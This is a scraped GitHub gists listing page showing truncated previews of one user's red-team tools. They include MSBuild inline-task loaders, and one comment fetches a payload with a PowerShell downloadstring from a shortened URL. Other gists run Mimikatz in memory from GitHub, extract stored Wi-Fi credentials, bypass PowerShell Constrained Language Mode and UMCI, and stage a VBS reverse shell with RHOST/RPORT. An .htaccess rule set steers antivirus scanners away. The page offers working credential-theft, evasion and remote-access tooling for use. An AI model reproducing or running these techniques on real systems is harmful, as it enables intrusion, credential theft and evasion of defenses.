Leo Loobeek leoloobeek
leoloobeek
/ msbuilder.xml
Created
July 24, 2017 13:15
MSBuild Execute Assembly From Environment Variable
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003"> | |
| <!-- This inline task executes c# code. --> | |
| <!-- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe msbuilder.xml --> | |
| <!-- Populate the Env Var like this or many other ways: --> | |
| <!-- $env:TheThingIs = (New-Object Net.Webclient).downloadstring('http://bit.ly/2tDkg2e') --> | |
| <!-- This has the advantage of keeping the assembly out of the xml on disk if it were ever recovered --> | |
| <!-- This is just a simple example... MSBuild is a rich scripting engine with lots of abiltiy to customize the build process --> | |
| <Target Name="Hello"> | |
| <SharpLauncher > | |
| </SharpLauncher> |
leoloobeek
/ katz.xml
Created
July 27, 2017 22:54
Downloads Mimikatz From GitHub, Executes Inside of MsBuild.exe
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003"> | |
| <!-- This inline task executes c# code. --> | |
| <!-- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe katz.xml --> | |
| <Target Name="Hello"> | |
| <SharpLauncher > | |
| </SharpLauncher> | |
| </Target> | |
| <UsingTask | |
| TaskName="SharpLauncher" | |
| TaskFactory="CodeTaskFactory" |
leoloobeek
/ netkatz.cs
Last active
July 26, 2024 04:05
Downloads and Executes Mimikatz In Memory From GitHub
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| using System; | |
| using System.IO; | |
| using System.Net; | |
| using System.Text; | |
| using System.IO.Compression; | |
| using System.Collections.Generic; | |
| using System.Configuration.Install; | |
| using System.Runtime.InteropServices; | |
leoloobeek
/ LoadMethodScanner.ps1
Created
July 28, 2017 02:48
— forked from mattifestation/LoadMethodScanner.ps1
A crude Load(byte[]) method scanner for UMCI bypass research
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Author: Matthew Graeber (@mattifestation) | |
| # Load dnlib with Add-Type first | |
| # dnlib can be obtained here: https://github.com/0xd4d/dnlib | |
| # Example: ls C:\ -Recurse | Get-AssemblyLoadReference | |
| filter Get-AssemblyLoadReference { | |
| param ( | |
| [Parameter(Mandatory = $True, ValueFromPipelineByPropertyName = $True)] | |
| [Alias('FullName')] | |
| [String] | |
| [ValidateNotNullOrEmpty()] |
leoloobeek
/ Extract-WiFi-Creds.ps1
Created
October 3, 2017 02:14
— forked from gfoss/Extract-WiFi-Creds.ps1
Simple script to extract locally-stored Wi-Fi Credentials
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #====================================# | |
| # Extract Wi-Fi Credentials # | |
| # greg . foss @ owasp . org # | |
| # v0.1 -- July, 2017 # | |
| #====================================# | |
| # Licensed under the MIT License | |
| <# |
leoloobeek
/ Command.vbs
Created
November 6, 2017 23:14
— forked from staaldraad/Command.vbs
Using VBSMeter with Ruler
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Call X() | |
| End Function | |
| Dim RHOST: RHOST = "x.x.x.x" | |
| Dim RPORT: RPORT = "8999" | |
| Function Base64ToStream(b) | |
| Dim enc, length, ba, transform, ms | |
| Set enc = CreateObject("System.Text.ASCIIEncoding") | |
| length = enc.GetByteCount_2(b) |
leoloobeek
/ Injectable.cpp
Created
December 19, 2017 18:37
— forked from anonymous/Injectable.cpp
Simple UserMode Hook Example
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include <windows.h> | |
| #include <stdio.h> | |
| FARPROC fpCreateProcessW; | |
| BYTE bSavedByte; | |
| // Blog Post Here: | |
| // https://0x00sec.org/t/user-mode-rootkits-iat-and-inline-hooking/1108 | |
| // tasklist | findstr explore.exe |
leoloobeek
/ Remove-ConstrainedLanguageMode.ps1
Created
February 14, 2018 17:35
— forked from jschell/Remove-ConstrainedLanguageMode.ps1
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| function Remove-ConstrainedLanguageMode { | |
| <# | |
| .Synopsis | |
| Set language mode for a powershell session to 'full'. | |
| .Description | |
| Set language mode for a powershell session to 'full'. Leverages 'InstallUtil' | |
| and the Microsoft.Diagnostics.Runtime.dll resouces to adjust in memory values. | |
| .Example |
leoloobeek
/ .htaccess
Created
March 1, 2018 17:05
— forked from curi0usJack/.htaccess
Drop into your apache working directory to instantly redirect most AV crap elsewhere.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| RewriteEngine On | |
| #LogLevel alert rewrite:trace5 | |
| # BURN AV BURN | |
| # ForcePoint | |
| RewriteCond expr "-R '208.80.192.0/21'" [OR] | |
| # AWS & Other VT hosts | |
| RewriteCond expr "-R '54.0.0.0/8'" [OR] |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?xml version='1.0'?> | |
| <data> | |
| <circle> | |
| <radius>12</radius> | |
| </circle> | |
| <circle> | |
| <radius>37.5</radius> | |
| </circle> | |
| </data> |
OlderNewer